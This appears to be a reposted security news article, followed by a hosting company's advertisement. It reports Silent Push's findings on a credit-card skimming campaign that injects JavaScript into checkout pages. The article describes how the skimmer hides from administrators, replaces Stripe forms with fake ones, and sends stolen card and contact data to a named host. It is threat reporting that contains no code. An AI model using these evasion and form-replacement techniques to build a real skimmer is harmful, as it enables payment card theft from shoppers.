Cybersecurity researchers have recently uncovered a significant web skimming campaign that has been active since January 2022, specifically targeting major payment networks such as American Express, Diners Club, Discover, JCB Co., Ltd., Mastercard, and UnionPay. Silent Push highlighted that enterprise organizations partnering with these payment providers are the ones most likely to be affected.
Digital skimming, also known as Magecart, involves cybercriminals compromising legitimate e-commerce sites and payment portals. They inject malicious JavaScript code designed to stealthily collect sensitive information, such as credit card data, during the checkout process without the users’ awareness. Initially associated with targeting Magento-based e-commerce sites, this kind of attack has evolved to encompass various platforms.
The investigatory efforts of Silent Push revealed the campaign’s infrastructure connected to a now-sanctioned bulletproof hosting provider named Stark Industries, a part of the rebranded entity THE.Hosting. This change was a tactic for evading sanctions. A domain named cdn-cookie.com was identified as a host for obfuscated JavaScript payloads utilized for credit card skimming.
The malicious skimmer possesses a variety of evasion techniques, including detecting the presence of a "wpadminbar" element in the Document Object Model (DOM) of websites, which signifies that a user is logged in as an administrator. If such an element is found, the skimmer executes a self-destruct sequence, removing any traces of itself from the web page. This process is triggered each time the DOM is modified, a common event during user interactions.
Moreover, if the skimmer detects that Stripe is used as a payment method, it looks for a localStorage element called "wc_cart_hash." If this element isn’t present, the skimmer replaces the legitimate Stripe payment form with a counterfeit version, tricking users into entering their credit card information, including expiration dates and CVC codes. Once this information is obtained, it appears to the user that their payment details were simply incorrect due to an error displayed on the page.
In addition to payment information, the skimmer also captures names, phone numbers, email addresses, and shipping addresses. Data is then exfiltrated through an HTTP POST request sent to "lasorie.com." After sending this information, the skimmer cleans up its presence, reinstating the original Stripe input form and marking the user with the "wc_cart_hash" to avoid running the skimmer on the same individual again.
Silent Push speculates that the attacker has a deep understanding of WordPress functionalities, integrating various lesser-known features into their malicious activities. This sophisticated approach indicates an uptick in the level of cybercriminal operations targeting e-commerce platforms, demanding increased vigilance from businesses and users alike.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.